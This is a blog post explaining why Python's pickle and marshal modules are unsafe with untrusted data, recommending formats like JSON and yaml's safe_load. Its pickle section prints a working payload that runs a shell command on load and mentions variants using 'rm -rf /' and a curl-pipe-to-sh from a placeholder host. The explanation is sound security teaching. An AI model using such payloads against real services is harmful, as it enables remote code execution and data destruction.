Security of Python’s pickle and marshal modules
Written on 14 Nov 2014
Both the pickle
and marshal
modules come with a similar
big red warning:
The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
The marshal module is not intended to be secure against erroneous or maliciously constructed data. Never unmarshal data received from an untrusted or unauthenticated source.
Lets see why.
Marshal
There are no known ways to exploit marshal
. Executing code when using
marshal.loads()
is not something I was able to do, and looking at the
marhal.c
source code, I don’t see an immediately obvious way.
So why is this warning here? The BDFL explains:
BTW the warning for marshal is legit – the C code that unpacks marshal data has not been carefully analyzed against buffer overflows and so on. Remember the first time someone broke into a system through a malicious JPEG? The same could happen with marshal. Seriously.
I recommend you read the rest of the discussion; a bug is shown where unmarshaling data causes Python to segfault; this has been fixed since Python 2.5 (this bug can, potentially, be abused to execute code). Other bugs may still exist, though!
Furthermore, the marshal
docs mention:
This is not a general “persistence” module. [..] The marshal module exists mainly to support reading and writing the “pseudo-compiled” code for Python modules of .pyc files.
So it’s not even designed to persist data in a reliable way.
Pickle
You can easily execute arbitrary code with pickle
. For example:
>>> import pickle
>>> pickle.loads(b"cos\nsystem\n(S'ls /'\ntR.")
bin data download home lib64 mnt proc run srv tmp usr var
boot dev etc lib lost+found opt root sbin sys ubuntu vagrant
0
This is a harmless ls /
, but can also be a less harmless rm -rf /
, or a
curl http://example.com/hack.sh | sh
.
You can see how this works by using the pickletools
module:
>>> import pickletools
>>> pickletools.dis(b"cos\nsystem\n(S'ls /'\ntR.")
0: c GLOBAL 'os system'
11: ( MARK
12: S STRING 'ls /'
20: t TUPLE (MARK at 11)
21: R REDUCE
22: . STOP
pickle.py
has some comments on what these opcodes mean:
GLOBAL = b'c' # push self.find_class(modname, name); 2 string args
MARK = b'(' # push special markobject on stack
STRING = b'S' # push string; NL-terminated string argument
TUPLE = b't' # build tuple from topmost stack items
REDUCE = b'R' # apply callable to argtuple, both on stack
STOP = b'.' # every pickle ends with STOP
Most of it is self-explanatory; with GLOBAL
you can get any function, and
with REDUCE
you call it.
Since Python is pretty dynamic, you can also use this to monkey-patch a program
in run-time. For example, you can change the check_password
function with one
where you upload the password to a server.
So what is secure?
XML, json, MessagePack, ini files, or perhaps something else. It depends on which format is the best in your situation.
Has this code been “carefully analyzed against buffer overflows and so on”? Who knows. Most code hasn’t, and C makes it easy to do things wrong.[1] Even Python code may be vulnerable, as it may call functions implemented in C that are vulnerable.
There have been problems with Python’s JSON module. But at the same
time, it’s used a lot in public-facing apps, so it’s probably safe. It’ll
certainly be safer than marshal
, since this was only designed for .pyc
files
and explicitly comes with a “not audited!” warning.
This is no guarantee. Remember that YAML security hole a few years back that caused every Ruby on Rails application in the world to be vulnerable to arbitrary code execution. Oops! And this wasn’t even a subtle buffer overflow, but a much more obvious problem.
You should not use yaml’s load()
method, as this has the same
problems as Ruby’s YAML. Use safe_load()
instead.
Conclusion
The warning in the pickle
module is very much warranted (it should be stated
stronger), while the warning above the marshal
module is more of a “this code
was not designed with security in mind“-type of warning, but actually
exploiting it is not as easy and relies on the hypothetical existence on unknown
bugs. Still, you’re probably better off using something else.
-
There really ought to be a “carefully analyzed against buffer overflows and so on” seal of trust for open source projects. Yeah, you can shelf out the big bucks and get your code analyzed by Veracode and such, but this is not feasible for open source projects. There is some effort to do this after the OpenSSL Heartbleed clusterfuck a few years ago in the form of the Core Infrastructure Initiative, but its scope and budget are limited (but it’s young, and may gain traction in a few years). ↩